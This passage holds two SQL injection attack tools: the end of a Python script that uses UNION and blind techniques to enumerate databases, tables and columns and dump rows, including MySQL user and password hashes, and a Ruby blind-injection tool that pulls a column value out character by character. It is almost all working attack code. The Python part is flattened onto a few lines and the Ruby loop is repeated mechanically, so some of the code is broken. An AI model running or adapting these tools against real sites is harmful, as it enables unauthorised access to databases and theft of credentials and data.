site.replace("darkc0de",darkc0de+"0x1e,0x20)")+"+FROM+"+arg_database+"."+arg_table if arg_where != "" or arg_orderby != "": if arg_where != "": arg_where = arg_where.split(",") print "[+] WHERE clause:","\""+arg_where[0]+"="+arg_where[1]+"\"" arg_where = "WHERE+"+arg_where[0]+"="+"0x"+arg_where[1].encode("hex") if arg_orderby != "": arg_orderby = "ORDER+BY+'"+arg_orderby+"'" print "[+] ORDERBY clause:",arg_orderby count_URL += "+"+arg_where line_URL += "+"+arg_where+"+"+arg_orderby if version[0] == 4: 
count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+"+arg_table line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")+"+FROM+"+arg_table elif mode == "--full": print "[+] Starting full SQLi information_schema enumeration..." line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)") line_URL += "+FROM+information_schema.columns+WHERE+table_schema!=0x"+"information_schema".encode("hex") count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)") count_URL += "+FROM+information_schema.columns+WHERE+table_schema!=0x"+"information_schema".encode("hex") elif mode == "--dbs": print "[+] Showing all databases current user has access too!" file.write("\n[+] Showing all databases current user has access too!") if arg_blind == "--blind": count_URL = site+"+and+((SELECT+COUNT(schema_name)" count_URL += "+FROM+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")+"))" line_URL = site+"+and+ascii(substring((SELECT+schema_name" line_URL += "+from+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex") else: count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)") count_URL += "+FROM+information_schema.schemata+WHERE+schema_name!=0x"+"information_schema".encode("hex") line_URL = site.replace("darkc0de","concat(0x1e,0x1e,schema_name,0x1e,0x20)") line_URL += "+FROM+information_schema.schemata+WHERE+schema_name!=0x"+"information_schema".encode("hex") arg_row = "Databases" if arg_blind == "--blind": count_URL+="))" line_URL+="+LIMIT+" else: count_URL += arg_end line_URL += "+LIMIT+NUM,1"+arg_end ## Blind Info --- I know it doesnt make sence where this code is.. but.. fuck it... 
if mode == "--info" and arg_blind == "--blind": head_URL = site+"+and+(SELECT+1+from+mysql.user+limit+0,1)=1" source = GetThatShit(head_URL) match = re.findall(arg_string,source) if len(match) >= 1: yesno = "YES <-- w00t w00t\n[!] Retrieve Info: --dump -D mysql -T user -C user,password" else: yesno = "NO" print "\n[+] Do we have Access to MySQL Database:",yesno;file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno)) print "\n[+] Showing database version, username@location, and database name!" file.write("\n\n[+] Showing database version, username@location, and database name!") line_URL = site+"+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database()))," row_value = 1 #Lets Count how many rows or columns if mode == "--schema" or mode == "--dump" or mode == "--dbs" or mode == "--full": if arg_blind == "--blind": row_value = GuessValue(count_URL) else: source = GetThatShit(count_URL) match = re.findall("\x1e\x1e\S+",source) match = match[0][2:].split("\x1e") row_value = match[0] print "[+] Number of "+arg_row+": "+str(row_value);file.write("\n[+] Number of "+arg_row+": "+str(row_value)+"\n") ## UNION Schema Enumeration and DataExt loop if arg_blind == "--union": if mode == "--schema" or mode == "--dump" or mode == "--dbs" or mode == "--full": while int(table_num) != int(row_value): try: source = GetThatShit(line_URL.replace("NUM",str(num))) match = re.findall("\x1e\x1e\S+",source) if len(match) >= 1: if mode == "--schema" or mode == "--full": match = match[0][2:].split("\x1e") if cur_db != match[0]: cur_db = match[0] if table_num == 0: print "\n[Database]: "+match[0];file.write("\n[Database]: "+match[0]+"\n") else: print "\n\n[Database]: "+match[0];file.write("\n\n[Database]: "+match[0]+"\n") print "[Table: Columns]";file.write("[Table: Columns]\n") if cur_table != match[1]: print "\n["+str(table_num+1)+"]"+match[1]+": "+match[2], file.write("\n["+str(table_num+1)+"]"+match[1]+": "+match[2]) cur_table = match[1] #table_num+=1 table_num 
= int(table_num) + 1 else: sys.stdout.write(",%s" % (match[2])) file.write(","+match[2]) sys.stdout.flush() #Gathering Databases only elif mode == "--dbs": match = match[0] if table_num == 0: print "\n["+str(num+1)+"]",match;file.write("\n["+str(num+1)+"]"+str(match)) else: print "["+str(num+1)+"]",match;file.write("\n["+str(num+1)+"]"+str(match)) table_num+=1 #Collect data from tables & columns elif mode == "--dump": match = re.findall("\x1e\x1e+.+\x1e\x1e",source) if match == []: match = [''] else: match = match[0].strip("\x1e").split("\x1e") if arg_rowdisp == 1: print "\n["+str(num+1)+"] ",;file.write("\n["+str(num+1)+"] ",) else: print;file.write("\n") for ddata in match: if ddata == "": ddata = "NoDataInColumn" sys.stdout.write("%s:" % (ddata)) file.write("%s:" % ddata) sys.stdout.flush() table_num+=1 else: if mode == "--dump": table_num+=1 sys.stdout.write("\n[%s] No data" % (num)) file.write("\n[%s] No data" % (num)) break num+=1 except (KeyboardInterrupt, SystemExit): raise except: pass ## Blind Schema Enumeration and DataExt loop if arg_blind == "--blind": if mode == "--schema" or mode == "--dbs" or mode == "--dump" or mode == "--info": lower_bound = 0 upper_bound = 127 print for data_row in range(int(num), row_value): sys.stdout.write("[%s]: " % (lim_num)) file.write("\n[%s]: " % (lim_num)) sys.stdout.flush() value = chr(upper_bound) while value != chr(0): if mode == "--info": Guess_URL = line_URL + str(let_pos)+",1))" else: Guess_URL = line_URL + str(lim_num) +",1),"+str(let_pos)+",1))" value = chr(GuessValue(Guess_URL)) sys.stdout.write("%s" % (value)) file.write(value) sys.stdout.flush() let_pos+=1 print lim_num = int(lim_num) + 1 let_pos = 1 data_row+=1 #Lets wrap it up! 
if mode == "--schema" or mode == "--full" or mode == "--dump": print "\n\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X")) else: print "\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X")) print "[-] Total URL Requests:",gets;file.write("\n[-] Total URL Requests: "+str(gets)) print "[-] Done\n";file.write("\n[-] Done\n") print "Don't forget to check", logfile,"\n" file.close()
  24. 
      # MySQL Blind Injection Tool
      # Coder => SH4V
      # n3t-datagrams.net
      require 'net/http'
      puts "host:"
      host=gets.chomp
      puts "extension:"
      ext=gets.chomp
      puts "columna:"
      col=gets.chomp
      puts "tabla:"
      tab= gets.chomp
      num="0"
      url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),1,1))=#{num}"
      http= Net::HTTP.new(host)
      corp1=http.get("#{url}")
      corp1=corp1.body
      corp2=http.get("#{url}333")
      corp2=corp2.body
      lon1=corp1.length
      lon2=corp2.length
      while lon1 == lon2
        num=num.succ
        url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),1,1))=#{num}"
        http= Net::HTTP.new(host)
        corp1=http.get("#{url}")
        corp1=corp1.body
        lon1=corp1.length
      end
      res=String.new
      res << "#{num}, "
      lon1=lon2
      num="0"
      while lon1 == lon2
        num=num.succ
        url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),2,1))=#{num}"
        http= Net::HTTP.new(host)
        corp1=http.get("#{url}")
        corp1=corp1.body
        lon1=corp1.length
      end
      res=String.new
      res << "#{num}, "
      lon1=lon2
      num="0"
      while lon1 == lon2
        num=num.succ
        url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),3,1))=#{num}"
        http= Net::HTTP.new(host)
        corp1=http.get("#{url}")
        corp1=corp1.body
        lon1=corp1.length
      end
      res=String.new
      res << "#{num}, "
      lon1=lon2
      num="0"
      while lon1 == lon2
        num=num.succ
        url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),4,1))=#{num}"
        http= Net::HTTP.new(host)
        corp1=http.get("#{url}")
        corp1=corp1.body
        lon1=corp1.length
      end
      res=String.new
      res << "#{num}, "
      lon1=lon2
      num="0"
      while lon1 == lon2
        num=num.succ
        url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),5,1))=#{num}"
        http= Net::HTTP.new(host)
        corp1=http.get("#{url}")
        corp1=corp1.body
        lon1=corp1.length
      end
      res=String.new
      res << "#{num}, "
      lon1=lon2
      num="0"
      while lon1 == lon2
        num=num.succ
        url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),6,1))=#{num}"
        http= Net::HTTP.new(host)
        corp1=http.get("#{url}")
        corp1=corp1.body
        lon1=corp1.length
      end
      res=String.new
      res << "#{num}, "
      lon1=lon2
      num="0"
      while lon1 == lon2
        num=num.succ
        url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),7,1))=#{num}"
        http= Net::HTTP.new(host)
        corp1=http.get("#{url}")
        corp1=corp1.body
        lon1=corp1.length
      end
      res=String.new
      res << "#{num}, "
      lon1=lon2
      num="0"
      while lon1 == lon2
        num=num.succ
        url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),8,1))=#{num}"
        http= Net::HTTP.new(host)
        corp1=http.get("#{url}")
        corp1=corp1.body
        lon1=corp1.length
      end
      res=String.new
      res << "#{num}, "
      lon1=lon2
      num="0"
      while lon1 == lon2
        num=num.succ
        url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),9,1))=#{num}"
        http= Net::HTTP.new(host)
        corp1=http.get("#{url}")
        corp1=corp1.body
        lon1=corp1.length
      end
      res=String.new
      res << "#{num}, "
      lon1=lon2
      num="0"
      while lon1 == lon2
        num=num.succ
        url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),10,1))=#{num}"
        http= Net::HTTP.new(host)
        corp1=http.get("#{url}")
        corp1=corp1.body
        lon1=corp1.length
      end
      res=String.new
      res << "#{num}, "
      lon1=lon2
      num="0"
      while lon1 == lon2
        num=num.succ
        url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),11,1))=#{num}"
        http= Net::HTTP.new(host)
        corp1=http.get("#{url}")
        corp1=corp1.body
        lon1=corp1.length
      end
      res=String.new
      res << "#{num}, "
      lon1=lon2
      num="0"
      while lon1 == lon2
        num=num.succ
        url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),12,1))=#{num}"
        http= Net::HTTP.new(host)
        corp1=http.get("#{url}")
        corp1=corp1.body
        lon1=corp1.length
      end
      res=String.new
      res << "#{num}, "
      lon1=lon2
      num="0"
      while lon1 == lon2
        num=num.succ
        url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),13,1))=#{num}"
        http= Net::HTTP.new(host)
        corp1=http.get("#{url}")
        corp1=corp1.body
        lon1=corp1.length
      end
      res=String.new
      res << "#{num}, "
      lon1=lon2
      num="0"
      while lon1 == lon2
        num=num.succ
        url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),14,1))=#{num}"
        http= Net::HTTP.new(host)
        corp1=http.get("#{url}")
        corp1=corp1.body
        lon1=corp1.length
      end
      res=String.new
      res << "#{num}, "
      lon1=lon2
      num="0"
      while lon1 == lon2
        num=num.succ
        url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),15,1))=#{num}"
        http= Net::HTTP.new(host)
        corp1=http.get("#{url}")
        corp1=corp1.body
        lon1=corp1.length
      end
      res=String.new
      res << "#{num}, "
      lon1=lon2
      num="0"
      while lon1 == lon2
        num=num.succ
        url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),16,1))=#{num}"
        http= Net::HTTP.new(host)
        corp1=http.get("#{url}")
        corp1=corp1.body
        lon1=corp1.length
      end
      res=String.new
      res << "#{num}, "
      lon1=lon2
      num="0"
      while lon1 == lon2
        num=num.succ
        url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),17,1))=#{num}"
        http= Net::HTTP.new(host)
        corp1=http.get("#{url}")
        corp1=corp1.body
        lon1=corp1.length
      end
      res=String.new
      res << "#{num}, "
      lon1=lon2
      num="0"
      while lon1 == lon2
        num=num.succ
        url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),18,1))=#{num}"
        http= Net::HTTP.new(host)
        corp1=http.get("#{url}")
        corp1=corp1.body
        lon1=corp1.length
      end
      res=String.new
      res << "#{num}, "
      lon1=lon2
      num="0"
      while lon1 == lon2
        num=num.succ
        url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),19,1))=#{num}"
        http= Net::HTTP.new(host)
        corp1=http.get("#{url}")
        corp1=corp1.body
        lon1=corp1.length
      end
      res=String.new
      res << "#{num}, "
      lon1=lon2
      num="0"
      while lon1 == lon2
        num=num.succ
        url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),20,1))=#{num}"
        http= Net::HTTP.new(host)
        corp1=http.get("#{url}")
        corp1=corp1.body
        lon1=corp1.length
      end
      res=String.new
      res << "#{num}, "
      lon1=lon2
      num="0"
      while lon1 == lon2
        num=num.succ
        url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),21,1))=#{num}"
        http= Net::HTTP.new(host)
        corp1=http.get("#{url}")
        corp1=corp1.body
        lon1=corp1.length
      end
      res=String.new
      res << "#{num}, "
      lon1=lon2
      num="0"
      while lon1 == lon2
        num=num.succ
        url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),22,1))=#{num}"
        http= Net::HTTP.new(host)
        corp1=http.get("#{url}")
        corp1=corp1.body
        lon1=corp1.length
      end